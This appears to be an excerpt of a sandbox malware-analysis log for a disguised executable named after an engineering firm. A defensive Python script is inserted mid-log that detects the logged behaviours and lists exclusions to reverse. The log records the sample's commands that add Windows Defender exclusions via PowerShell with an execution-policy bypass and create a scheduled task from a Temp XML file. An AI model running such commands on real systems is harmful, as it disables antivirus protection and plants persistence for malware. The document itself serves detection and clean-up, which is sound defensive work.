              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMutant created: \Sessions\1\BaseNamedObjects\TdUxMCK2FUdy51AH
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Local\Temp\tmp960E.tmp
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: SS Bottmac Engineers Pvt. Ltd..exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile read: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
              Source: unknownProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe C:\Users\user\AppData\Roaming\RTUZKYTc.exe
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
               Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: unknown Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
               Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: unknown Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
               Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
               Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
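The process-creation records above carry the three behaviours a detection engineer would alert on from this sample: Windows Defender exclusions added through powershell.exe (several of them with -ExecutionPolicy Bypass, and one covering the dropped RTUZKYTc.exe), a scheduled task "Updates\RTUZKYTc" registered by schtasks.exe /Create from an XML file in the user's Temp directory, and each payload re-launching its own image, which is the usual prelude to the suspended-process injection the report also flags. The following is an added example, not code from Joe Sandbox or from the sample, that replays eight of the lines above through those three rules and also extracts the exclusion values an analyst would hand to Remove-MpPreference during clean-up. The line layout (with the space between the source path and "Process created:" restored), the Finding type, the rule names and the regular expressions are our own assumptions; the rules are in the spirit of the Sigma detections the report cites but are not those rules.

```python
"""Replay of the report's process-creation lines through three detection
rules. Added example: not code from Joe Sandbox or from the sample. The
Finding type, rule names, regexes and log layout are our assumptions."""
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple

# Constructed input: eight lines copied from the report (parent image,
# child image, child command line), with the space the extraction dropped
# between the source path and "Process created:" put back.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
"""

# "Source: <parent image> Process created: <child image> <child command line>"
_LINE_RE = re.compile(r"^Source: (.+?) Process created: (.+?\.exe) (.*)$", re.I)
# Add-MpPreference -Exclusion<Kind> '<value>' or "<value>"
_EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)\s+(['\"])(.+?)\2", re.I)
# Directories a legitimate task XML is not normally imported from
_TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)


class Finding(NamedTuple):
    rule: str     # rule that fired
    parent: str   # parent image (the process that spawned the child)
    detail: str   # what was matched


def parse(log: str) -> List[Tuple[str, str, str]]:
    """Split the sandbox-style lines into (parent, image, cmdline) tuples."""
    events = []
    for line in log.strip().splitlines():
        m = _LINE_RE.match(line.strip())
        if m:
            events.append((m.group(1), m.group(2), m.group(3)))
    return events


def check_defender_exclusion(parent: str, image: str, cmdline: str) -> Optional[str]:
    """PowerShell adding a Defender exclusion; notes an execution-policy bypass."""
    if not image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    m = _EXCLUSION_RE.search(cmdline)
    if not m:
        return None
    bypass = " (with -ExecutionPolicy Bypass)" if re.search(
        r"-ExecutionPolicy\s+Bypass", cmdline, re.I) else ""
    return f"Defender Exclusion{m.group(1)} added for {m.group(3)}{bypass}"


def check_schtasks_temp_xml(parent: str, image: str, cmdline: str) -> Optional[str]:
    """schtasks /Create importing its task definition from a temp directory."""
    if not image.lower().endswith("\\schtasks.exe") or not re.search(r"\s/create\b", cmdline, re.I):
        return None
    xml = re.search(r'/XML\s+"?([^"]+)', cmdline, re.I)
    if not xml or not _TEMP_DIR_RE.search(xml.group(1)):
        return None
    tn = re.search(r'/TN\s+"?([^"\s]+)', cmdline, re.I)
    return f"task {tn.group(1) if tn else '?'} created from temp XML {xml.group(1)}"


def check_self_respawn(parent: str, image: str, cmdline: str) -> Optional[str]:
    """A process launching its own image; a precursor signal, not proof of injection,
    so it stays silent when the parent is unknown."""
    if parent.lower() != image.lower():
        return None
    return f"{image} re-launched its own image (corroborate with suspended-create/inject events)"


RULES: Dict[str, Callable[[str, str, str], Optional[str]]] = {
    "defender_exclusion": check_defender_exclusion,
    "schtasks_temp_xml": check_schtasks_temp_xml,
    "self_respawn": check_self_respawn,
}


def analyze(log: str) -> List[Finding]:
    """Run every rule over every event; findings keep the input order."""
    findings = []
    for parent, image, cmdline in parse(log):
        for name, rule in RULES.items():
            detail = rule(parent, image, cmdline)
            if detail:
                findings.append(Finding(name, parent, detail))
    return findings


def excluded_targets(log: str) -> Set[str]:
    """Values handed to -Exclusion*: the list to feed Remove-MpPreference on the host."""
    return {m.group(3) for _, image, cmd in parse(log)
            if image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))
            for m in _EXCLUSION_RE.finditer(cmd)}


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.rule}] parent={f.parent}\n    {f.detail}")
    print("exclusions to remove:", sorted(excluded_targets(SAMPLE_LOG)))
```

Run as a script it prints six findings for the eight constructed lines: three exclusion additions, one task import from Temp, and two self-respawns (the line whose parent the sandbox recorded as "unknown" deliberately produces none, and the conhost.exe line is benign). The rules work on the command line alone, so the self-respawn rule is a lead to confirm against the suspended-process and PE-injection events, not a verdict; the exclusion list is the concrete artefact to reverse on an infected host, together with the "Updates\RTUZKYTc" task.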
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: mscoree.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: apphelp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: kernel.appcore.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: version.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: uxtheme.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: windows.storage.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: wldp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: profapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: cryptsp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: rsaenh.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: cryptbase.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: dwrite.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: textshaping.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: windowscodecs.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: amsi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: userenv.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: msasn1.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: gpapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: propsys.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: edputil.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: urlmon.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: iertutil.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: srvcli.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: netutils.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: sspicli.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: wintypes.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: appresolver.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: bcp47langs.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: slc.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: sppc.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ntmarta.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
